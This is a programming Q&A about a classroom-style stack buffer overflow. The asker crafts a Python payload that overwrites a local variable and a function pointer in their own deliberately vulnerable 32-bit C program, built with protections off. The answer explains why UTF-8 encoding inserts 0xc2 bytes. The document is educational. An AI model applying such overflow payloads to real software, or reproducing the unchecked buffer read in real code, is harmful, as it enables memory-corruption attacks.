# Buffer Overflow - unexpected values inserted

Tags: python, c, assembly, x86, buffer-overflow

I'm trying to use buffer overflow to overwrite two local variables, so that I can call the hidden function. Here is the C code.

```
#include <stdio.h>
#include <stdlib.h>

static void hidden_function(void)
{
    puts("I laugh in the face of danger. Ha ha ha ha!");
}

static void visible_function(void)
{
    puts("Knock, knock! Who's there? Recursion. Recursion who? Knock, knock!");
}

static void helper_function(void)
{
    void (*f_ptr)(void) = visible_function;
    unsigned int dumb_number = 0x12345678;
    char buffer[32];

    printf("Provide buffer input: ");
    fgets(buffer, 64, stdin);

    printf("Dumb number value is 0x%08x.\n", dumb_number);
    printf("Buffer is %s\n", buffer);

    f_ptr();
}

int main(void)
{
    helper_function();

    return 0;
}
```

This is the Makefile that I use.

```
CC = gcc
CFLAGS = -m32 -Wall -Wextra -Wno-unused-function -g -O0 -fno-stack-protector -no-pie
LDFLAGS = -m32

.PHONY: all clean

all: overflow_ptr

overflow_ptr: overflow_ptr.o
    $(CC) $(CFLAGS) -o $@ $<

overflow_ptr.o: overflow_ptr.c

clean:
    -rm -f overflow_ptr.o overflow_ptr
    -rm -f *~
```

Running nm overflow_ptr shows me that the address of the hidden function is the following:

```
080484a6 t hidden_function
```

So I created the following payload:

```
python3 -c 'print(32*"A" + "\x21\x43\x65\x87" + "\xa6\x84\x04\x08")'
```

This is supposed to make dump_number = 0x87654321 and f_ptr = 0x080484a6. However, when I run this program the output is:

```
Provide buffer input: Dumb number value is 0xc2654321.
```

Which makes me wonder why was that c2 inserted? I'm assumming it's some kind of protection measure. If so, is there any way to prevent it?
I'm using a 64-bit virtual machine with Ubuntu.

Comment: When running `python3 -c 'print(32*"A" + "\x21\x43\x65\x87" + "\xa6\x84\x04\x08")' | od -x` the values do not correspond. But it seems like a python problem.  Maybe you can try to fix it or add the python tag.

Comment: You have an utf8 conversion somewhere.

Answer (score 1, accepted):

Your Python is likely defaulting to [`UTF-8`](https://en.wikipedia.org/wiki/UTF-8) input/output encoding rather than [`ISO-8859-1`](https://en.wikipedia.org/wiki/ISO/IEC_8859-1). You can override the default Python IO encoding by setting the environment variable `PYTHONIOENCODING`

You could run `overflow_ptr` with this command:

> echo $(PYTHONIOENCODING="ISO-8859-1" python3 -c 'print(32*"A" + "\x21\x43\x65\x87" + "\xa6\x84\x04\x08")') | ./overflow_ptr

The output should be:

> ```
> Provide buffer input: Dumb number value is 0x87654321.
> Buffer is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA!Ce���
> I laugh in the face of danger. Ha ha ha ha!
> ```

---

I suspect on your system if you were to run this command:

> python3 -c 'print(32*"A" + "\x21\x43\x65\x87" + "\xa6\x84\x04\x08")' | od -tx1 -v

That the output would be something like:

> ```
> 0000000 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
> 0000020 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
> 0000040 21 43 65 c2 87 c2 a6 c2 84 04 08 0a
> ```

The output you were probably expecting was:

> ```
> 0000000 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
> 0000020 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
> 0000040 21 43 65 87 a6 84 04 08 0a
> ```

You'll notice that in the first output all the values >= 0x80 were translated into multiple bytes, each starting with 0xc2. That character conversion is what introduced the unexpected `c2`into your dumb number value.

---

Notes:

- If you wish to avoid Python adding the extra 0x0a to the end you can tell the `print` function to eliminate it by doing it this way:

  > print(32*"A" + "\x21\x43\x65\x87" + "\xa6\x84\x04\x08",end="")

  By specifying `end=""` as a parameter to `print` you eliminate the terminating 0x0a (linefeed) character.